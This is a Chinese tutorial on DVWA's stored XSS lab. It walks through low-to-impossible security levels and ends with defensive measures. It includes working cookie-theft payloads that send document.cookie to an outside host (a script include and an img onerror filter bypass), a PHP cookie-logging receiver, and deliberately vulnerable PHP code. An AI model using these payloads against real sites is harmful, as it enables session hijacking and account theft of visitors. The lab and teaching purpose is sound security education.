DVWA 黑客攻防演练(十一) 存储型 XSS 攻击 Stored Cross Site Scripting
上一篇文章会介绍了反射型 XSS 攻击。本文主要是经过 dvwa 介绍存储型 XSS 攻击。存储型 XSS 攻击影响范围极大。好比是微博、贴吧之类的,如有注入漏洞,再假如攻击者能用上一篇文章相似的代码获取用户的 cookies,想一想若是代码中再加入自动转发功能,每一个看过那条微博的用户都会被偷 cookies 和自动转发!像网络病毒同样的传播速度啊!恐怖如斯!javascript
低级
功能很简单。点击提交就会有相应的文字。 此时,Hacker 在里面输入 <script>alert(1)</script>php
也就是有注入漏洞了。因而 Hacker 再输入了 <script src="//www.a.com/test.js"></script>,html
//test.js
var img = document.createElement("img")
img.src = "http://www.a.com/?cookies="+escape(document.cookie);
document.body.appendChild(img);
而后全部看到这条信息的用户的 cookies 就会被偷走了。 而低级的代码是这样的,没有作任何的防御前端
<?php
if( isset( $_POST[ 'btnSign' ] ) ) {
// Get input
$message = trim( $_POST[ 'mtxMessage' ] );
$name = trim( $_POST[ 'txtName' ] );
// Sanitize message input
$message = stripslashes( $message );
$message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Sanitize name input
$name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Update database
$query = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
//mysql_close();
}
?>
中级
中级代码,会意识到这个问题 因此会对 message 进行处理java
- addslashes 每一个引号前添加反斜杠(" -> \")
- strip_tags 去掉 HTML 的标签 (Hello -> Hello)
- mysql_real_escape_string 函数,对
",',\r等特殊符号转义 - htmlspecialchars ,对 html 相关的字符转义,防止浏览器将其用做 HTML 元素,好比
>转成>
<?php
if( isset( $_POST[ 'btnSign' ] ) ) {
// Get input
$message = trim( $_POST[ 'mtxMessage' ] );
$name = trim( $_POST[ 'txtName' ] );
// Sanitize message input
$message = strip_tags( addslashes( $message ) );
$message = mysql_real_escape_string( $message );
$message = htmlspecialchars( $message );
// Sanitize name input
$name = str_replace( '<script>', '', $name );
$name = mysql_real_escape_string( $name );
// Update database
$query = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
$result = mysql_query( $query ) or die( '<pre>' . mysql_error() . '</pre>' );
//mysql_close();
}
?>
然而百密一疏,name 字段只有去掉 script 字符串 和用mysql_real_escape_string函数进行转义
全部能够利用 name 字段注入mysql
Hacker 输入在 Name 字段输入 前端那里有个字符长度的限制。你能够用火狐直接将 maxlength 改大,或者用 brupSuite 的改就能够了。 因此这代码最后仍是能够被注入的。sql
高级
高级代码 对 name 的验证有所改变。后端
<?php //... // Sanitize name input $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name ); $name = mysql_real_escape_string( $name ); //... ?>
若是看过上一篇文章,应该会了解。这样的代码能够用 img 等元素绕过的。 <img src=x onerror="e=escape;this.src='//www.a.com?cookies='+e(document.cookie)"> 要改下 www.a.com/index.php 由于本来只是记录 cookies 到文件中,不返回图片的。这段注入代码执行后会不断地发请求的。因此改为返回一张图片就能够了。好比浏览器
<?php
$name = 'gakki.jpg';
$fp = fopen($name, 'rb');
header("Content-Type: image/png");
header("Content-Length: " . filesize($name));
fpassthru($fp);
$c = $_GET["cookies"];
echo $c;
error_log($c ."". "\n",3,"/var/log/a/cookies");
?>
结果以下
cookie
沉迷我老婆美色的时候,cookie 就被偷走了
不可能
不可能级别有
- anti-token 机制防 CSRF 攻击
- 使用 db->prepare 预编译,绑定参数的方式,防 SQL 攻击
- name 和 message 参数经过
htmlspecialchars等函数防护
<?php
if( isset( $_POST[ 'btnSign' ] ) ) {
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
// Get input
$message = trim( $_POST[ 'mtxMessage' ] );
$name = trim( $_POST[ 'txtName' ] );
// Sanitize message input
$message = stripslashes( $message );
$message = mysql_real_escape_string( $message );
$message = htmlspecialchars( $message );
// Sanitize name input
$name = stripslashes( $name );
$name = mysql_real_escape_string( $name );
$name = htmlspecialchars( $name );
// Update database
$data = $db->prepare( 'INSERT INTO guestbook ( comment, name ) VALUES ( :message, :name );' );
$data->bindParam( ':message', $message, PDO::PARAM_STR );
$data->bindParam( ':name', $name, PDO::PARAM_STR );
$data->execute();
}
// Generate Anti-CSRF token
generateSessionToken();
?>
防护 XSS 攻击
下面是防护 XSS 攻击的措施
- 参数校验,好比中高级的若是 name 参数后端也判断了长度不能超过 10。 攻击者注入的难度的增大不少了。好比百度网盘这个案例
- 后端可使用 HttpOnly 的方式,以前的攻击手段基本会用 document.cookies 就能获取当前网页的 cookie 了。 好比这样
<?php
header("Set-Cookie: cookie1=test1");
header("Set-Cookie: cookie2=test2;httponly",false)
?>
<script>
alert(document.cookie);
</script>
只会把 cookie1=test1 弹窗。就算有漏洞也能够减小损失
- 输出的检查,好比 php 中 htmlspecialchars 函数。
相关文章
- 1. 什么是Cross-Site Scripting(XSS)攻击
- 2. XSS(Cross Site Scripting)-跨站脚本攻击
- 3. XSS(Cross Site Scripting)
- 4. Cross-Site Scripting (XSS)
- 5. 网络攻击技术(二)——Cross-site scripting
- 6. Cross-Site Scripting XSS 跨站攻击全攻略
- 7. dvwa XSS存储型(Stored)
- 8. DVWA之Stored XSS(存储型XSS)
- 9. DVWA-XSS (Stored)(存储型跨站脚本攻击)
- 10. Cross Site Scripting (XSS) and prevention
- 更多相关文章...
- • MySQL存储过程简介 - MySQL教程
- • Hibernate的一级缓存 - Hibernate教程
- • 三篇文章了解 TiDB 技术内幕——说存储
- • Kotlin学习(二)基本类型
相关标签/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
欢迎关注本站公众号,获取更多信息
相关文章
- 1. 什么是Cross-Site Scripting(XSS)攻击
- 2. XSS(Cross Site Scripting)-跨站脚本攻击
- 3. XSS(Cross Site Scripting)
- 4. Cross-Site Scripting (XSS)
- 5. 网络攻击技术(二)——Cross-site scripting
- 6. Cross-Site Scripting XSS 跨站攻击全攻略
- 7. dvwa XSS存储型(Stored)
- 8. DVWA之Stored XSS(存储型XSS)
- 9. DVWA-XSS (Stored)(存储型跨站脚本攻击)
- 10. Cross Site Scripting (XSS) and prevention